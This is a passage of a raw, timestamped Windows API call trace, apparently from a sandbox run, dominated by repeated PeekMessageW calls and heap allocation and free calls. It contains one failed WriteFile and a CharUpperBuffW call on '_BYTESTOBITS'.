wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.575] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.575] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.575] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.575] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.575] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.575] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.575] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc3d620 | out: hHeap=0xbc0000) returned 1 [0257.575] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.575] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.575] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.575] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.575] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.576] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.576] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.576] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.576] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.576] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.576] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.576] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.576] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.576] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.576] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.576] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.576] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.576] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.576] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.576] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.576] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.576] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.576] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.576] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.576] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.576] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.577] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.577] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc3d620 | out: hHeap=0xbc0000) returned 1 [0257.577] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.577] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc3d5e0 | out: hHeap=0xbc0000) returned 1 [0257.577] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.577] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.577] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.577] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.577] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.577] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.577] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.577] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.577] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.577] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.577] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.577] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.577] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.577] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.577] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.577] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.577] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.577] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.577] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.577] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.578] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.578] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.578] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.578] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.578] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.578] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.578] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.578] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.578] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.578] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.578] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.578] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.578] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.578] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.578] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.578] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.578] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.578] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.578] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.578] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.578] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.578] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.578] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.578] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.579] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.579] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.579] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.579] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.579] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.579] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.579] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.579] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.579] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.579] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.579] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.579] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.579] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.579] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.579] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.579] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.579] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.579] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.579] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.579] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.579] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.579] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.579] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.580] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc3d5e0 | out: hHeap=0xbc0000) returned 1 [0257.580] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.580] GetLastError () returned 0x6 [0257.580] SetLastError (dwErrCode=0x6) [0257.580] GetLastError () returned 0x6 [0257.580] SetLastError (dwErrCode=0x6) [0257.580] WriteFile (in: hFile=0xfffffffe, lpBuffer=0xc04290, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x7de0c8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x7de0c8, lpOverlapped=0x0) returned 0 [0257.580] GetLastError () returned 0x6 [0257.580] GetLastError () returned 0x6 [0257.580] SetLastError (dwErrCode=0x6) [0257.580] GetLastError () returned 0x6 [0257.580] SetLastError (dwErrCode=0x6) [0257.580] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcdf350 | out: hHeap=0xbc0000) returned 1 [0257.580] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01968 | out: hHeap=0xbc0000) returned 1 [0257.580] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc052b0 | out: hHeap=0xbc0000) returned 1 [0257.580] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b78 | out: hHeap=0xbc0000) returned 1 [0257.580] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9dd8 | out: hHeap=0xbc0000) returned 1 [0257.580] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9af0 | out: hHeap=0xbc0000) returned 1 [0257.580] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe050 | out: hHeap=0xbc0000) returned 1 [0257.580] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0257.580] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b78 [0257.580] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01968 [0257.580] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x18) returned 0xc2d2f8 [0257.581] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc2d2f8 | out: hHeap=0xbc0000) returned 1 [0257.581] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01968 | out: hHeap=0xbc0000) returned 1 [0257.581] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b78 | out: hHeap=0xbc0000) returned 1 [0257.581] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0257.581] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b78 [0257.581] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b78 | out: hHeap=0xbc0000) returned 1 [0257.581] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0257.581] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b78 [0257.581] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe050 [0257.581] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9af0 [0257.581] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01968 [0257.581] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01968 | out: hHeap=0xbc0000) returned 1 [0257.581] QueryPerformanceCounter (in: lpPerformanceCount=0x7dfa28 | out: lpPerformanceCount=0x7dfa28*=18807798411) returned 1 [0257.582] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9af0 | out: hHeap=0xbc0000) returned 1 [0257.582] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe050 | out: hHeap=0xbc0000) returned 1 [0257.582] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b78 | out: hHeap=0xbc0000) returned 1 [0257.582] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0257.582] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe050 [0257.582] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9af0 [0257.582] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b78 [0257.582] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01968 [0257.582] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe190 [0257.582] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0257.583] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe190 | out: hHeap=0xbc0000) returned 1 [0257.583] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01968 | out: hHeap=0xbc0000) returned 1 [0257.583] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe190 [0257.583] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc01968 [0257.583] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe078 [0257.583] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9dd8 [0257.583] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01948 [0257.583] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.583] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xcd9ac0 [0257.583] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe208 [0257.583] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9be0 [0257.583] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01948 [0257.583] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9bf8 [0257.583] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x40) returned 0xbfb0d8 [0257.583] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.583] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe230 [0257.583] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9bc8 [0257.583] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01938 [0257.583] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d48 [0257.583] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.583] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe280 [0257.583] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d00 [0257.583] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01928 [0257.583] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9da8 [0257.583] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9dc0 [0257.583] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01958 [0257.583] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9dc0 | out: hHeap=0xbc0000) returned 1 [0257.583] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9dc0 [0257.583] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01958 | out: hHeap=0xbc0000) returned 1 [0257.583] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe258 [0257.583] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.583] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01958 [0257.583] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda708 [0257.583] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda690 [0257.583] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 